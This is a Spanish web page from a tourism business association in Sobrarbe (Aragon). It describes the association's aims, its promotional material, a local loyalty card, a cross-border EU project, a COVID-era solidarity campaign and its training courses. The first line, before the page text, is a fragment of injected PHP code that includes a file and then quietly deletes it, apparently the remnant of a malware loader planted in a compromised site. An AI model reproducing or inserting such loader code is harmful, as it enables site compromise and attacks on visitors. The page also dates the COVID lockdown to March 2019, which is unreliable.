");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Asociación Empresarial Turística de Sobrarbe.

¿Qué hacemos?

Fines de la AETS:

 

Fines generales:


Su fin genérico es la representación, gestión, promoción y defensa de los intereses socioeconómicos comunes a sus miembros y la prestación de servicios de formación a sus socios y al público general.

Fines específicos:


- Lograr acuerdos con unidad de criterios en la fijación de las directrices para la solución de problemas comunes a los miembros de la Asociación.
- Informar y asesorar a los empresarios integrados en la Asociación en todas aquellas materias que puedan ofrecer un interés profesional, estableciendo al efecto los servicios que sean necesarios.
- Informar, asesorar y negociar con la Administración Central, Regional, Provincial, Comarcal y Local, cuando se debatan asuntos que afecten de modo general a los intereses de los empresarios integrados en la Asociación.
- Cualquier otro objetivo que suponga un interés socioeconómico común a la generalidad de los miembros de la propia Asociación.

Acciones específicas de la AETS:

 

1- Defensa de los intereses empresariales


Es nuestra labor más importante. Necesitamos una voz única y específica para defender nuestros intereses empresariales. Tanto a nivel comarcal, como a nivel más específico de algún segmento empresarial de la comarca.

Convenios firmados por la Asociación para representación de sus socios en otras entidades

2- Acciones de promoción del destino Sobrarbe

Material promocional


En cuanto a promoción se refiere, se editan anualmente unos:

  • 15.000 ejemplares de una guía de servicios en tres idiomas. En ella aparece información general y turística sobre la comarca de Sobrarbe y sus atractivos, así como la guía de servicios y listado completo de socios de la AETS.
  • 20.000 ejemplares del folleto 27 excursiones y paseos recomendados en tres idiomas. Se trata de una guía exclusiva de excursiones, muy cotizada entre nuestros socios y las oficinas de información turística, y en el que también sale el listado completo de nuestros socios.
  • 30.000 mapas turísticos de la comarca de Sobrarbe, en formato taco o plegado en el que se da visibilidad a los atractivos turísticos y naturales de Sobrarbe y de los valles de Aure y Louron en Francia. En el reverso se presentan los servicios más específicos de la nieve en el territorio Pirineos Sobrarbe-Aure-Louron.

Este material se distribuye en ferias, tanto nacionales como e internacionales, y sirve de herramienta en actos de promoción como workshops. También se reparte en la Oficinas de Turismo de la comarca y de los valles de Aure y Louron en Francia. También se manda, bajo petición, a cualquier oficina de información que lo solicite (ejemplo: oficina de turismo de Aragón en Zaragoza).


Páginas webs y redes sociales

Otras herramientas de promoción que posee la AETS son:

  1. la página web www.ordesasobrarbe.com, página de información turística en tres idiomas para dar a conocer nuestra Comarca y sus atractivos.
  2. Las redes sociales Facebook e Instagram propias de la entidad más todas las redes sociales de iniciativas y proyectos llevados a cabo desde la Asociación o en colaboración con nosotros:

3- Gestión y dinamización de la tarjeta de fidelización del comercio comarcal Vivo Sobrarbe

Una veintena de establecimientos del Sobrarbe, en su mayoría comercios, aunque también están adheridos talleres y establecimientos de hostelería, constituyen la red de fidelización común Vivo Sobrarbe.
los establecimientos revierten, en forma de dinero acumulado en una tarjeta, el 1% de las compras a los clientes finales. También hacen una aportación adicional que sirve a mantener el sistema (gastos corrientes, de promoción y de mantenimiento) y a generar premios económicos que fomentan las compras y la economía circular.


Página web: www.vivosobrarbe.com
RRSS: Vivo Sobrarbe

 

4- Proyectos de cooperación y de promoción solidaria

  • Proyecto POCTEFA DUSAL

Un territorio común transfronterizo España- Francia. Un proyecto lleno de experiencias turísticas, culturales y naturaleza. El legado de la estrecha relación que ha existido entre estos valles desde hace siglos.
Quince socios de Sobrarbe y los Valles de Aure y Louron (Pyrénées2Vallées), unidos a través del Túnel de Bielsa-Aragnouet, trabajan conjuntamente para generar una estrategia de desarrollo socio-económico sostenible en el territorio, poniendo en valor su patrimonio natural y cultural y, la creación de productos turísticos transfronterizos.


Su objetivo: consolidar un ÚNICO DESTINO TURÍSTICO.


Este es el sello de Pirineos Sobrarbe Aure-Louron y el proyecto DUSAL es la herramienta para realizarlo . Proyecto cofinanciado al 65% por el Fondo Europeo de Desarrollo Regional FEDER.


Más información sobre el programa europeo INTERREG POCTEFA:
www.poctefa.eu
https://ec.europa.eu/regional_policy/es/


Más información sobre el proyecto POCTEFA DUSAL:
https://pirineos-sobrarbe-aure-louron.eu/
RRSS: Pirineos Sobrarbe Aure Louron

 

  • Sobrarbe te cuida

Campaña solidaria de reconocimiento a la labor del personal sanitario que estuvo en primera línea durante la pandemia del COVID-19, especialmente en la primera ola y confinamiento, con la consiguiente saturación del sistema sanitario.


Los empresarios del Sobrarbe se unieron para regalar, de forma desinteresada, 100 estancias a sanitarios con sus acompañantes para que pudieran reponer fuerzas tras el confinamiento de marzo 2019.
Un ejemplo de generosidad y de unión sin precedentes en nuestro territorio.


A esta campaña solidaria le siguió una campaña promocional en la que los oficios expuestos al virus durante la primera ola de la pandemia pudieron apuntarse para recibir un bono vacacional con descuentos exclusivos en los establecimientos de Sobrarbe adheridos a la campaña.


Página web: https://sobrarbetecuida.com/
RRSS: Sobrarbe te cuida

Formación

 

1- Centro de formación inscrito y acreditado por el Instituto Aragonés de Empleo (INAEM)

 

Nuestro centro imparte formación para el empleo desde el año 2009. Participa de la convocatoria de desempleados en formación presencial.


Está actualmente acreditado en la especialidad conducente a certificado de profesionalidad:
HOTU0109 -ALOJAMIENTO RURAL


E inscrito en las especialidades no conducentes a certificado de profesionalidad:
SSCE12 -FRANCÉS A1
SSCE13 -FRANCÉS A2
SSCE01 -INGLES (A1)
SSCE02 -INGLES (A2)
SSCE03 -INGLES (B1)
SSCE04 -INGLES (B2)


En 2021, el centro de formación de Sobrarbe se certifica en el sistema de gestión de la calidad ISO 9001.


2- Formación de demanda

Nuestro centro colabora con varias entidades para acercar la formación a sus socios.
Organismos como el IAF o la Cámara de Comercio de Huesca nos traen cada año los cursos que les solicitamos para su impartición en presencial o vía seminario web.
Por otra parte, también organizamos los cursos de formación que nos demandan los socios, intentando además encontrar vías de financiación para abaratar su coste.